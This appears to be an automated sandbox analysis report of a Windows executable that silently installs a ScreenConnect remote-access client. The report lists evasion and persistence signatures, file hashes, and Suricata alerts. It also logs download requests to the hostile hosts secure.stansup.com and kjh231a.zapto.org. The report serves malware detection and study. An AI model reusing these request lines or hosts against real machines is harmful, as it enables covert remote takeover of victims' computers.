Windows Analysis Report
96r3GgxntQ.exe

Overview

General Information

Sample name: 96r3GgxntQ.exe
renamed because original name is a hash value
Original sample name: a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f.exe
Analysis ID: 1542316
MD5: 1d59c17159ad086256e0c1c2c34666ae
SHA1: aaf33cf2f9e970a41535a556dc507e667288ac82
SHA256: a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f
Tags: exesecure-stansup-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score: 66
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 20
Range: 0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

AV Detection

barindex
Source: 96r3GgxntQ.exe ReversingLabs: Detection: 23%
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.5% probability
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree, 0_2_00BB1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe Jump to behavior

Compliance

barindex
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Unpacked PE file: 11.2.ScreenConnect.ClientService.exe.5560000.0.unpack
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe Jump to behavior
Source: 96r3GgxntQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 96r3GgxntQ.exe Static PE information: certificate valid
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49891 version: TLS 1.2
Source: 96r3GgxntQ.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 96r3GgxntQ.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A06C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1730092141.00000000008AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A068000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734596134.0000000005692000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB4A4B FindFirstFileExA, 0_2_00BB4A4B
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\ Jump to behavior

Networking

barindex
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry value created: NULL Service
Source: global traffic TCP traffic: 192.168.2.11:49944 -> 79.110.49.185:8041
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: Joe Sandbox View IP Address: 79.110.49.185 79.110.49.185
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49796
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49784
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49891
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49834
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49880
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49844
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49910
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49859
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
Source: global traffic DNS traffic detected: DNS query: secure.stansup.com
Source: global traffic DNS traffic detected: DNS query: kjh231a.zapto.org
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 00000008.00000002.2609938156.000001CEA36C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609998357.000001CEA36DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1389610111.000001CEA3153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 00000008.00000002.2609739077.000001CEA36AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/tbA
Source: svchost.exe, 00000008.00000002.2607941732.000001CEA28B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/tb_
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD40.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000007.00000002.2610850094.0000025CF7A84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000002.00000002.2256114237.00000276A41A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: dfsvc.exe, 00000002.00000002.2256340310.00000276A41D4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.8.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
